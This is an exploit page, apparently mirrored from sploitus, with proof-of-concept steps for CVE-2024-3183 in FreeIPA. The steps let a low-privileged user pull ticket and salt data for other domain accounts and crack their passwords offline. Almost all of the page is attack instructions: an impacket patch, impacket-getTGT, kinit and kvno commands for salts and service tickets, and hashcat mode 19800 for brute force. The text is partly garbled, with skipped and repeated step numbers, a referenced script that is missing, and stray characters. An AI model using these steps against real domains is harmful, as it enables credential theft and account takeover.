## https://sploitus.com/exploit?id=DBE93EB3-5994-5F1D-9B2F-0300617124DC
# CVE-2024-3183-POC
POC for CVE-2024-3183 (FreeIPA Rosting)
Impact:
A low-privileged user can obtain a hash of the passwords of all domain users and perform offline brute force (kerberoasting).
Patch impacket-getTGT:
1) Add `decoder.decode.defaultErrorState = stGetValueDecoderByTag` to `impacket/krb5/kerberosv5.py`.
2) Enjoy!
## POC1:
1) Add `decoder.decode.defaultErrorState = stGetValueDecoderByTag` to `impacket/krb5/kerberosv5.py`.
2) You can use impacket-getTGT whith `-service` option and `-debug` option for get salt in one command.
`impacket-getTGT test.local/user -debug -service admin`
## POC2:
1) First, let's request a TGT ticket for an already compromised user "admin".
`kinit user`

2) Secondly, we will find out the salt of the "admin" user:
`printf "%b" "0\n" | KRB5_TRACE=/dev/stdout kinit admin | grep salt`

3) Get TGS for "admin":
`kvno admin`


5) Use python script (or hashcat mod 19800 with specific salt) for brute force TGS

1 - TGS,
2 - SALT,
3 - Passwords.
5) Congratulations, we now have the user password โadminโ.
## POC3:
1) You can use kinit for one move:
`kinit -S target user`
and you get TGT who encripted by target user key.